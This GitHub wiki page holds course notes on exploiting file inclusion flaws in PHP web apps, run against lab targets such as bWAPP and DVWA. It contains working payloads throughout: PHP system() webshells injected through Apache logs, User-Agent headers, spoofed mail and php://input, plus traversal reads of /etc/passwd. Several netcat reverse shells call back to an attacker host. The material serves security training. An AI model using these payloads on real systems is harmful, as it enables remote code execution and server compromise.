App Vulnerabilities: File Inclusions - Paiet/SEC-335 GitHub Wiki

  • File inclusion
    • What is file inclusion?
      • Calling on a file for info from a local or remote source
    • How do you test for it?
      • Vulnerability Scanners
      • Manual testing
        • Look for files being called by the web app
          • In the URL
            • file=file1.php&...
            • file=http://victim.com/resource.php&...
    • Remote
      • Calls a file from a remote server
        • Test by modifying URL to reach out to attack server for file
          • Payload = /root/Tools/test
      • We can redirect to Attack Server for malicious payload
        • DEMO: bWAPP File Inclusion (RFI)
          • Payload = /root/Tools/netkat.php
    • Local
      • Uses files from target's local server
        • Test by trying to read /etc/passwd
          • Sometimes you will need to try dir traversal
            • Explain Directory Traversal
              • Improper configuration
                • ../../../../../../../../etc/passwd

App Vulnerabilities: File Inclusions Pt.2

  • Attack methodology
    • Manipulate commonly accessible files
      1. /var/log/apache2/access.log
      • Works only if web user has read permission to this file

        • Use netcat to create bogus GET request

          • nc -nv 10.0.0.175 80
GET /<?php system($_GET['cmd']); ?>
<PRESS ENTER UNTIL YOU SEE RETURN OUTPUT>

        • Use file inclusion to access log file with payload

          • file=/var/log/apache2/access.log&cmd=nc -nv 10.0.0.199 4444 -e /bin/bash
            • Check listener for connection
      1. /proc/self/environ
      • Older vector, so may be locked down as well
        • Works with DVWA :)
          • Use environ file to see output
            • Notice USER_AGENT
              • We can modify that with Burp
                • Change User Agent to...
                  • <?php system("nc -nv 10.0.0.199 4444 -e /bin/bash");?>
      1. Exploit email

      • Telnet into mail server on port 25

      • Spoof email from root to www-data

      • Add payload to the body of the email +

        EHLO
HELO
MAIL FROM:<root>
RCPT TO:<www-data>
DATA

<?php

system("nc -nv 10.0.0.199 4444 -e /bin/bash");
?>
.
QUIT

      • Include /var/spool/mail/www-data and check listener

      1. File upload utility
      • Take advantage of any file upload utils the web app provides
        • Then just use your uploaded payload file in the include
          • File type filter
            • Use Magic Number to evade file-type filter
              • GIF98 or GIF98a
    • Filter/Blacklist evasion
      • Add NULL operator to end of included file payload
        • %00 or %2500
          • This stops the processing of any chars after NULL
      • PHP Filters
        • php://
          • Straight php filter
            • file=php://filter/resource=/etc/passwd
          • Base64 encoding/decoding
            • file=php://filter/convert.base64-encode/resource=/etc/passwd
          • php input
            • file=php://input&cmd=nc -nv 10.0.0.199 4444 -e /bin/bash
              • Intercept with Burp
                • Add reverse shell to bottom of POST request
                  • <?php echo shell_exec($_GET['cmd']);?>
                    • Check listener for shell
⚠️ **GitHub.com Fallback** ⚠️